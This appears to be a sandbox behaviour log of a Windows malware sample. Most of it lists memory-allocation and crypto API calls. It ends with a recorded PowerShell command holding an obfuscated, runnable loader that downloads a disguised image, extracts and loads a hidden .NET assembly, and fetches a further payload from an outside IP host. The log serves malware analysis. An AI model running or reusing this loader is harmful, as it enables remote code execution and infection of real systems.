crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0031e310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0031e310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0031e310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0031e310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2736
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2736
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02991000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02992000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0279a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02792000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0279c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02793000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02794000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02795000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02796000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02797000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02798000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02799000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DU⁂⇵OQ⁂⇵v⁂⇵DU⁂⇵MQ⁂⇵w⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵cgB1⁂⇵G0⁂⇵c⁂⇵Bf⁂⇵H⁂⇵⁂⇵cgBp⁂⇵HY⁂⇵YQB0⁂⇵GU⁂⇵LgBq⁂⇵H⁂⇵⁂⇵Zw⁂⇵/⁂⇵DE⁂⇵Ng⁂⇵5⁂⇵D⁂⇵⁂⇵NQ⁂⇵w⁂⇵DQ⁂⇵MQ⁂⇵y⁂⇵Dk⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵TgBl⁂⇵Hc⁂⇵LQBP⁂⇵GI⁂⇵agBl⁂⇵GM⁂⇵d⁂⇵⁂⇵g⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵TgBl⁂⇵HQ⁂⇵LgBX⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵7⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Hc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵C4⁂⇵R⁂⇵Bv⁂⇵Hc⁂⇵bgBs⁂⇵G8⁂⇵YQBk⁂⇵EQ⁂⇵YQB0⁂⇵GE⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBV⁂⇵HI⁂⇵b⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵EU⁂⇵bgBj⁂⇵G8⁂⇵Z⁂⇵Bp⁂⇵G4⁂⇵ZwBd⁂⇵Do⁂⇵OgBV⁂⇵FQ⁂⇵Rg⁂⇵4⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBC⁂⇵Hk⁂⇵d⁂⇵Bl⁂⇵HM⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBT⁂⇵FQ⁂⇵QQBS⁂⇵FQ⁂⇵Pg⁂⇵+⁂⇵Cc⁂⇵Ow⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBF⁂⇵E4⁂⇵R⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵E8⁂⇵Zg⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BG⁂⇵Gw⁂⇵YQBn⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵ZQ⁂⇵g⁂⇵D⁂⇵⁂⇵I⁂⇵⁂⇵t⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵d⁂⇵⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵Cs⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵LgBM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵7⁂⇵CQ⁂⇵YgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵T⁂⇵Bl⁂⇵G4⁂⇵ZwB0⁂⇵Gg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBT⁂⇵HU⁂⇵YgBz⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵s⁂⇵C⁂⇵⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵QwBv⁂⇵G4⁂⇵dgBl⁂⇵HI⁂⇵d⁂⇵Bd⁂⇵Do⁂⇵OgBG⁂⇵HI⁂⇵bwBt⁂⇵EI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵FM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵ZQBk⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQ⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵UgBl⁂⇵GY⁂⇵b⁂⇵Bl⁂⇵GM⁂⇵d⁂⇵Bp⁂⇵G8⁂⇵bg⁂⇵u⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQBd⁂⇵Do⁂⇵OgBM⁂⇵G8⁂⇵YQBk⁂⇵Cg⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵V⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵o⁂⇵Cc⁂⇵RgBp⁂⇵GI⁂⇵ZQBy⁂⇵C4⁂⇵S⁂⇵Bv⁂⇵G0⁂⇵ZQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵d⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵u⁂⇵Ec⁂⇵ZQB0⁂⇵E0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵Cg⁂⇵JwBW⁂⇵EE⁂⇵SQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GE⁂⇵cgBn⁂⇵HU⁂⇵bQBl⁂⇵G4⁂⇵d⁂⇵Bz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Cw⁂⇵K⁂⇵⁂⇵n⁂⇵HQ⁂⇵e⁂⇵B0⁂⇵C4⁂⇵S⁂⇵BC⁂⇵C8⁂⇵QQBU⁂⇵FM⁂⇵V⁂⇵⁂⇵v⁂⇵DQ⁂⇵Lg⁂⇵1⁂⇵Dc⁂⇵MQ⁂⇵u⁂⇵D⁂⇵⁂⇵MQ⁂⇵y⁂⇵C4⁂⇵Mg⁂⇵5⁂⇵DE⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
